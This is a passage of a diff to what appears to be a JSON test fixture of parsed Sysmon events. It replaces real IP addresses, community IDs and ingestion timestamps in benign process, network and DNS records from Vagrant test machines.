xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:39.012744700Z'/\u003e\u003cEventRecordID\u003e7\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:39.012\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce03-5c8f-0000-0010e9462a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4508\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\wbem\\WmiPrvSE.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e6.3.9600.16384 (winblue_rtm.130821-1623)\u003c/Data\u003e\u003cData Name='Description'\u003eWMI Provider Host\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=5A4C0E82FF95C9FB762D46A696EF9F1B68001C21\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1b-5c8c-0000-00102f610000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e560\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\svchost.exe -k DcomLaunch\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7553,15 +7469,15 @@ }, "destination": { "port": 53, - "ip": "a00:203:3000:3000:3000:3000:3000:3300" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 62141, - "ip": "a00:20f:0:0:18a2:6e00:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "domain", - "community_id": "1:EQDBfI6vAylArTBQHY8kNmaweOA=", + "community_id": "1:o5sHG56d/GR7mu8ASz0uSsv7uF0=", "transport": "udp", "type": "ipv6", "direction": "egress" @@ -7575,14 +7491,13 @@ "NETWORK SERVICE" ], "ip": [ - "a00:20f:0:0:18a2:6e00:e0:ffff", - "a00:203:3000:3000:3000:3000:3000:3300" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741602800Z", + "ingested": "2021-12-09T13:50:23.456977900Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ea00:203:3000:3000:3000:3000:3000:3300\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.089Z", @@ -7660,7 +7575,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741607200Z", + "ingested": "2021-12-09T13:50:23.456983600Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e9\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.3\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7712,7 +7627,7 @@ }, "destination": { "port": 443, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 1138, @@ -7721,7 +7636,7 @@ }, "network": { "protocol": "https", - "community_id": "1:W2ZbP8nXMY+YAGYw2h/3Sa8Gu/w=", + "community_id": "1:BPIgbA//CuXUCUo7V4pQn4uLQOk=", "transport": "tcp", "type": "ipv4", "direction": "egress" @@ -7736,13 +7651,13 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741611600Z", + "ingested": "2021-12-09T13:50:23.456989400Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -7792,7 +7707,7 @@ }, "destination": { "port": 443, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 1139, @@ -7801,7 +7716,7 @@ }, "network": { "protocol": "https", - "community_id": "1:5MsyqYltV9KkhIFGPWiByzQqHDo=", + "community_id": "1:FaLCJ8g6qTBdQh1Rvg2/ru25R6M=", "transport": "tcp", "type": "ipv4", "direction": "egress" @@ -7816,13 +7731,13 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741615400Z", + "ingested": "2021-12-09T13:50:23.456995600Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -7892,17 +7807,17 @@ "type": "CNAME" }, { - "data": "23.50.53.179", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.177", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.179", - "23.50.53.177" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -7919,14 +7834,13 @@ "ocsp.int-x3.letsencrypt.org" ], "ip": [ - "23.50.53.179", - "23.50.53.177" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741621300Z", + "ingested": "2021-12-09T13:50:23.457001500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7990,11 +7904,11 @@ "type": "CNAME" }, { - "data": "172.217.12.195", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -8002,7 +7916,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -8010,7 +7924,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -8018,7 +7932,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -8026,21 +7940,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "172.217.12.195", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -8056,22 +7970,22 @@ "ocsp.pki.goog" ], "ip": [ - "172.217.12.195", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741630200Z", + "ingested": "2021-12-09T13:50:23.457007200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData 